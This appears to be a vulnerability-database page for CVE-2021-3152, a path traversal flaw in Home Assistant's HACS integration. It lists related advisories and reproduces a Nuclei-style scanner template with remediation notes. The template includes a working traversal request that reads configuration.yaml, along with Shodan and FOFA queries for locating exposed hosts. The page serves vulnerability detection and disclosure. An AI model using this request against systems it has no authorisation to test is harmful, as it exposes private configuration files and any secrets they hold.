| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| [ASA-202101-44] home-assistant: information disclosure | 29 Jan 202100:00 | – | archlinux | |
| CVE-2021-3152 | 22 Apr 202608:43 | – | circl | |
| Home Assistant 路径遍历漏洞 | 26 Jan 202100:00 | – | cnnvd | |
| Home Assistant Directory Traversal Vulnerability | 29 Jan 202100:00 | – | cnvd | |
| CVE-2021-3152 | 21 Jan 202115:10 | – | cve | |
| CVE-2021-3152 | 21 Jan 202115:10 | – | cvelist | |
| CVE-2021-3152 | 26 Jan 202118:16 | – | nvd | |
| Home Assistant < 2021.1.3 Path Traversal Vulnerability | 15 Jun 202300:00 | – | openvas | |
| Directory traversal | 26 Jan 202118:16 | – | prion | |
| PT-2021-19401 | 21 Jan 202100:00 | – | ptsecurity |
id: CVE-2021-3152
info:
name: Home Assistant HACS - Local File Inclusion
author: DhiyaneshDk
severity: high
description: |
Home Assistant before 2021.1.3 lacks a protection layer against directory-traversal attacks in custom integrations, letting attackers access arbitrary files, exploit requires attacker to deploy malicious custom integration.
impact: |
Attackers can access sensitive files on the system, potentially leading to information disclosure or further system compromise.
remediation: Update to version 2021.1.3 or later to include protection against directory traversal in custom integrations.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-3152
- https://lyghtnox.gitlab.io/posts/hacs-exploit/
- https://www.home-assistant.io/blog/2021/01/22/security-disclosure/
- https://github.com/hacs/integration/commit/f2b7cb711e41a94b81610f6ff96ea314e9879114
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-3152
epss-score: 0.02231
epss-percentile: 0.80549
cwe-id: CWE-22
metadata:
verified: false
max-request: 1
vendor: hacs
product: integration
shodan-query: title:"Home Assistant"
fofa-query: title="Home Assistant"
tags: cve,cve2021,hacs,homeassistant,lfi
http:
- raw:
- |
GET /hacsfiles/../../configuration.yaml HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "default_config:"
- "homeassistant:"
condition: or
- type: status
status:
- 200
# digest: 4b0a00483046022100c6ea9a338629251120891052e765d09a9ede44f66d0279a2de7b05c836ab73c6022100dc0d4815a02683c572822a02936fa070d394f772226234f5144ae7429817eedf:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation